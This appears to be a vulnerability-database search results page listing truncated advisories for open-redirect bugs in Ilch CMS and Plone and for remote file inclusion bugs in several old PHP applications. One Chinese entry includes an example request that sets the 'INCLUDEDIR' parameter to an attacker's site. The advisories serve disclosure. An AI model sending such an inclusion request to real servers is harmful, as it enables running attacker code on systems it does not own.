18 matches found
CVE-2021-27352
An open redirect vulnerability in Ilch CMS version 2.1.42 allows attackers to redirect users to an attacker's site after a successful login...
Plone Open Redirect Vulnerability
An open redirect on the login form and possibly other places in Plone 4.0 through 5.2.1 allows an attacker to craft a link to a Plone Site that, when followed, and possibly after login, will redirect to an attacker's site...
GHSA-82J9-WFCF-9V2H Plone Open Redirect Vulnerability
An open redirect on the login form and possibly other places in Plone 4.0 through 5.2.1 allows an attacker to craft a link to a Plone Site that, when followed, and possibly after login, will redirect to an attacker's site...
CVE-2021-27352
An open redirect vulnerability in Ilch CMS version 2.1.42 allows attackers to redirect users to an attacker's site after a successful login...
CVE-2021-27352
An open redirect vulnerability in Ilch CMS version 2.1.42 allows attackers to redirect users to an attacker's site after a successful login...
Open redirect
An open redirect vulnerability in Ilch CMS version 2.1.42 allows attackers to redirect users to an attacker's site after a successful login...
CVE-2020-7936
An open redirect on the login form and possibly other places in Plone 4.0 through 5.2.1 allows an attacker to craft a link to a Plone Site that, when followed, and possibly after login, will redirect to an attacker's site...
CVE-2020-7936
An open redirect on the login form and possibly other places in Plone 4.0 through 5.2.1 allows an attacker to craft a link to a Plone Site that, when followed, and possibly after login, will redirect to an attacker's site...
Open redirect
An open redirect on the login form and possibly other places in Plone 4.0 through 5.2.1 allows an attacker to craft a link to a Plone Site that, when followed, and possibly after login, will redirect to an attacker's site...
PYSEC-2020-85
An open redirect on the login form and possibly other places in Plone 4.0 through 5.2.1 allows an attacker to craft a link to a Plone Site that, when followed, and possibly after login, will redirect to an attacker's site...
YACS 6.6.1 - Multiple Remote File Include Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/19799/info YACS is prone multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote file...
GR Board 1.8.6 - page.php Remote File Inclusion
GR Board 1.8.6 - page.php Remote File Inclusion source: https://www.securityfocus.com/bid/40437/info GR Board is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application an...
Article System远程文件包含漏洞
Article System是一款基于PHP的WEB应用程序。 Article System不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'INCLUDEDIR'参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 Article System 1.0 http://artsys.sourceforge.net/ http://example.com/scriptpath/include/forms.php?INCLUDEDIR=attacker's site...
Fantastic Scripts Fantastic News远程文件包含漏洞
Fantastic News是一款基于PHP的新闻管理程序。 Fantastic News不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'news.php'脚本对用户提交的'CONFIGscriptpath'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Fantastic Scripts Fantastic News 2.1.3 http://fscripts.com/free.php?id=1 http://www.example.com/Script...
MyWebland miniBloggie Fname远程文件包含漏洞
MyWebland miniBloggie是一款基于PHP的网络日记程序。 MyWebland miniBloggie不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'clsfasttemplate.php'脚本对用户提交的'fname'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 myWebland miniBloggie 1.0 http://mywebland.neopages.net/...
A-Conman Common.Inc.PHP远程文件包含漏洞
A-Conman是一款基于php的WEB应用程序。 A-Conman不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Common.Inc.PHP'脚本对用户提交的'cmbasedir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 a-ConMan a-ConMan 3.2b 目前没有解决方案提供: http://www.a-conman.com/...
Exporia 0.3 - Common.php Remote File Inclusion
Exporia 0.3 - Common.php Remote File Inclusion source: https://www.securityfocus.com/bid/20205/info Exporia is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied data. Exploiting this issue could allow an attacker to compromise the...
YACS 6.6.1 - Multiple Remote File Inclusions
source: https://www.securityfocus.com/bid/19799/info YACS is prone multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execut...